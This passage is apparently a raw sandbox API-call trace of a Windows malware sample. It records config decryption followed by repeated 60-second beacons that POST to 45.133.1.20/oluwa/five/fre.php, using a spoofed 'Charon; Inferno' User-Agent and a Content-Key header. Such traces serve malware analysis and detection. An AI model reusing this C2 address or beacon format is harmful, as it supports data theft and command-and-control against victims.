close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.744] GetProcessHeap () returned 0x6a0000 [0277.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0277.744] GetProcessHeap () returned 0x6a0000 [0277.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0277.745] send (s=0x9fc, buf=0x6bd460*, len=242, flags=0) returned 242 [0277.746] send (s=0x9fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0277.746] GetProcessHeap () returned 0x6a0000 [0277.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0277.746] recv (in: s=0x9fc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0277.816] GetProcessHeap () returned 0x6a0000 [0277.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0277.817] GetProcessHeap () returned 0x6a0000 [0277.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0277.818] GetProcessHeap () returned 0x6a0000 [0277.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba3b0 | out: hHeap=0x6a0000) returned 1 [0277.818] GetProcessHeap () returned 0x6a0000 [0277.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0277.818] closesocket (s=0x9fc) returned 0 [0277.819] GetProcessHeap () returned 0x6a0000 [0277.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0277.819] GetProcessHeap () returned 0x6a0000 [0277.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.819] GetProcessHeap () returned 0x6a0000 [0277.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0277.820] GetProcessHeap () returned 0x6a0000 [0277.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0277.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1790) returned 0x9fc [0277.822] Sleep (dwMilliseconds=0xea60) [0277.823] GetProcessHeap () returned 0x6a0000 [0277.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0277.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.825] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0277.848] GetProcessHeap () returned 0x6a0000 [0277.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0277.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.849] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.851] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.852] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.852] GetProcessHeap () returned 0x6a0000 [0277.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0277.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.854] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0277.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.858] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.865] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0277.865] GetProcessHeap () returned 0x6a0000 [0277.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.866] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.868] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.869] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.870] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.870] GetProcessHeap () returned 0x6a0000 [0277.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0277.870] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.871] GetProcessHeap () returned 0x6a0000 [0277.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0277.871] GetProcessHeap () returned 0x6a0000 [0277.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.871] GetProcessHeap () returned 0x6a0000 [0277.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0277.872] GetProcessHeap () returned 0x6a0000 [0277.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0277.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.873] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0277.888] GetProcessHeap () returned 0x6a0000 [0277.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0277.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.892] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.893] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.893] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.893] GetProcessHeap () returned 0x6a0000 [0277.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0277.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.895] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0277.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.896] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.896] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0277.897] GetProcessHeap () returned 0x6a0000 [0277.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.898] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0277.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.902] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0277.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.903] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0277.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.904] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0277.904] GetProcessHeap () returned 0x6a0000 [0277.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0277.904] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0277.904] GetProcessHeap () returned 0x6a0000 [0277.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0277.904] socket (af=2, type=1, protocol=6) returned 0xa00 [0277.905] connect (s=0xa00, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0277.938] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0277.938] GetProcessHeap () returned 0x6a0000 [0277.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0277.938] GetProcessHeap () returned 0x6a0000 [0277.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0277.939] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.941] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.941] GetProcessHeap () returned 0x6a0000 [0277.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9cf0 [0277.941] GetProcessHeap () returned 0x6a0000 [0277.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0277.941] GetProcessHeap () returned 0x6a0000 [0277.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0277.941] GetProcessHeap () returned 0x6a0000 [0277.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0277.943] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.944] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.945] GetProcessHeap () returned 0x6a0000 [0277.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0277.945] GetProcessHeap () returned 0x6a0000 [0277.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0277.945] send (s=0xa00, buf=0x6bd460*, len=242, flags=0) returned 242 [0277.946] send (s=0xa00, buf=0x6bb998*, len=159, flags=0) returned 159 [0277.946] GetProcessHeap () returned 0x6a0000 [0277.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0277.946] recv (in: s=0xa00, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0278.019] GetProcessHeap () returned 0x6a0000 [0278.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0278.022] GetProcessHeap () returned 0x6a0000 [0278.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0278.022] GetProcessHeap () returned 0x6a0000 [0278.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf0 | out: hHeap=0x6a0000) returned 1 [0278.023] GetProcessHeap () returned 0x6a0000 [0278.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0278.023] closesocket (s=0xa00) returned 0 [0278.024] GetProcessHeap () returned 0x6a0000 [0278.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0278.024] GetProcessHeap () returned 0x6a0000 [0278.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.024] GetProcessHeap () returned 0x6a0000 [0278.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0278.025] GetProcessHeap () returned 0x6a0000 [0278.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0278.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1794) returned 0xa00 [0278.027] Sleep (dwMilliseconds=0xea60) [0278.029] GetProcessHeap () returned 0x6a0000 [0278.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0278.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0278.050] GetProcessHeap () returned 0x6a0000 [0278.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.052] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0278.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.055] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.056] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.056] GetProcessHeap () returned 0x6a0000 [0278.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.057] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0278.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.058] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0278.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.059] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0278.059] GetProcessHeap () returned 0x6a0000 [0278.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.060] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.061] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.062] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.065] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.065] GetProcessHeap () returned 0x6a0000 [0278.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0278.065] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.065] GetProcessHeap () returned 0x6a0000 [0278.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0278.066] GetProcessHeap () returned 0x6a0000 [0278.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.067] GetProcessHeap () returned 0x6a0000 [0278.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0278.067] GetProcessHeap () returned 0x6a0000 [0278.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0278.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.080] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0278.088] GetProcessHeap () returned 0x6a0000 [0278.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.089] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0278.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.090] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.091] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.091] GetProcessHeap () returned 0x6a0000 [0278.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.092] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0278.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.093] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0278.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.100] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0278.100] GetProcessHeap () returned 0x6a0000 [0278.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.102] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0278.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.103] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0278.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.104] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0278.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.105] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0278.105] GetProcessHeap () returned 0x6a0000 [0278.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0278.105] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0278.105] GetProcessHeap () returned 0x6a0000 [0278.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0278.105] socket (af=2, type=1, protocol=6) returned 0xa04 [0278.105] connect (s=0xa04, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0278.128] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0278.128] GetProcessHeap () returned 0x6a0000 [0278.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0278.128] GetProcessHeap () returned 0x6a0000 [0278.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0278.130] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.131] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.131] GetProcessHeap () returned 0x6a0000 [0278.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9cf0 [0278.131] GetProcessHeap () returned 0x6a0000 [0278.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0278.132] GetProcessHeap () returned 0x6a0000 [0278.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0278.132] GetProcessHeap () returned 0x6a0000 [0278.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0278.133] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.134] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.134] GetProcessHeap () returned 0x6a0000 [0278.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0278.134] GetProcessHeap () returned 0x6a0000 [0278.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0278.135] send (s=0xa04, buf=0x6bd460*, len=242, flags=0) returned 242 [0278.135] send (s=0xa04, buf=0x6bb998*, len=159, flags=0) returned 159 [0278.135] GetProcessHeap () returned 0x6a0000 [0278.135] RtlAllocateHeap (HeapHandle=0x6a0000, 